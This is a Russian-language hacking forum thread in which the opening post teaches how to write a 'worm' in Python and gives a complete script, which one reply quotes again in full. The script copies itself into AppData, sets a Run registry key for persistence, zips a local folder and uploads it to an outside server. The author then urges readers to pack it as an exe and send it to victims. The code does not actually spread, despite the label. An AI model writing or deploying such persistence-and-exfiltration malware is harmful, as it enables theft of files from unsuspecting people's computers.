Пишем своего червя на Python

[barboskin]

Привет мои юные кулхацкеры! Сегодня сы с вам напишем простенького червя на языке Python

Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в папку AppData.

directory = os.getenv("APPDATA") + r'/your_program/'

base_file = directory + os.path.basename(__file__)

if not os.path.exists(directory):

    os.makedirs(directory)

    shutil.copy(__file__, base_file)

Первым делом я решил закрепить наш файл в автозапуске операционной системе, делал я это через реестр.

Тут нам поможет модуль winreg.

path_to_reestr = OpenKey(HKEY_CURRENT_USER,

                        r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',

                        0, KEY_ALL_ACCESS)

SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)

CloseKey(path_to_reestr)

В переменной мы установили путь до реестра, дальше добавили значение нашего вируса,

лучше назвать его как-то неприметно, но я во все услышание ознаменовал его 'Virus'.

И устанавливаем путь до файла (base_file).

Ну и тупо в три строчки напишем тело нашего червя:

# Добавляем папку в аврхив

shutil.make_archive(r'Имя архива', 'zip', r'Папка')


# Отправляем архив на сервер

files = {'Имя архива': open('Имя архива', 'rb')}

r = requests.post('http://httpbin.org/post', files=files)

Добавляем его в архив и отправляем его на сервер с помощью post запроса.

В итоге у нас должно получиться что-то наподобие этого

Весь скрипт

import shutil

import os

import sys

import requests

from winreg import *



def autorun():

    # Путь, который будет светиться в авторане

    directory = os.getenv("APPDATA") + r'/your_program/'

    base_file = directory + os.path.basename(__file__)


    if not os.path.exists(directory):

        os.makedirs(directory)

        shutil.copy(__file__, base_file)


    # Путь в реестре

    path_to_reestr = OpenKey(HKEY_CURRENT_USER,

                     r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',

                     0, KEY_ALL_ACCESS)

    # Установить программу "Virus" в автозагрузку

    SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)

    # Закрыть реестр

    CloseKey(path_to_reestr)


def addToZip():

    # Добавляем папку в аврхив

    shutil.make_archive(r'C:\\file', 'zip', r'C:\xampp')[/SPOILER]


    # Отправляем архив на сервер

    files = {'file.zip': open('C:\\file.zip', 'rb')}

    r = requests.post('http://httpbin.org/post', files=files)


autorun()

addToZip()

Далее пакуем его в exe и идем кидать жертвам.

 

[X-DMIN]

Расписал так, аж интерессно читать )))

 

[purge420]

о давно мечтал научиться.отдуши

 

[purge420]

Только

Привет мои юные кулхацкеры! Сегодня сы с вам напишем простенького червя на языке Python

Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в папку AppData.

directory = os.getenv("APPDATA") + r'/your_program/'

base_file = directory + os.path.basename(__file__)

if not os.path.exists(directory):

    os.makedirs(directory)

    shutil.copy(__file__, base_file)

Первым делом я решил закрепить наш файл в автозапуске операционной системе, делал я это через реестр.

Тут нам поможет модуль winreg.

path_to_reestr = OpenKey(HKEY_CURRENT_USER,

                        r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',

                        0, KEY_ALL_ACCESS)

SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)

CloseKey(path_to_reestr)

В переменной мы установили путь до реестра, дальше добавили значение нашего вируса,

лучше назвать его как-то неприметно, но я во все услышание ознаменовал его 'Virus'.

И устанавливаем путь до файла (base_file).

Ну и тупо в три строчки напишем тело нашего червя:

# Добавляем папку в аврхив

shutil.make_archive(r'Имя архива', 'zip', r'Папка')


# Отправляем архив на сервер

files = {'Имя архива': open('Имя архива', 'rb')}

r = requests.post('http://httpbin.org/post', files=files)

Добавляем его в архив и отправляем его на сервер с помощью post запроса.

В итоге у нас должно получиться что-то наподобие этого

Весь скрипт

import shutil

import os

import sys

import requests

from winreg import *



def autorun():

    # Путь, который будет светиться в авторане

    directory = os.getenv("APPDATA") + r'/your_program/'

    base_file = directory + os.path.basename(__file__)


    if not os.path.exists(directory):

        os.makedirs(directory)

        shutil.copy(__file__, base_file)


    # Путь в реестре

    path_to_reestr = OpenKey(HKEY_CURRENT_USER,

                     r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',

                     0, KEY_ALL_ACCESS)

    # Установить программу "Virus" в автозагрузку

    SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)

    # Закрыть реестр

    CloseKey(path_to_reestr)


def addToZip():

    # Добавляем папку в аврхив

    shutil.make_archive(r'C:\\file', 'zip', r'C:\xampp')[/SPOILER]


    # Отправляем архив на сервер

    files = {'file.zip': open('C:\\file.zip', 'rb')}

    r = requests.post('http://httpbin.org/post', files=files)


autorun()

addToZip()

Далее пакуем его в exe и идем кидать жертвам.

Только я не понял что он будет делать и какой сервер?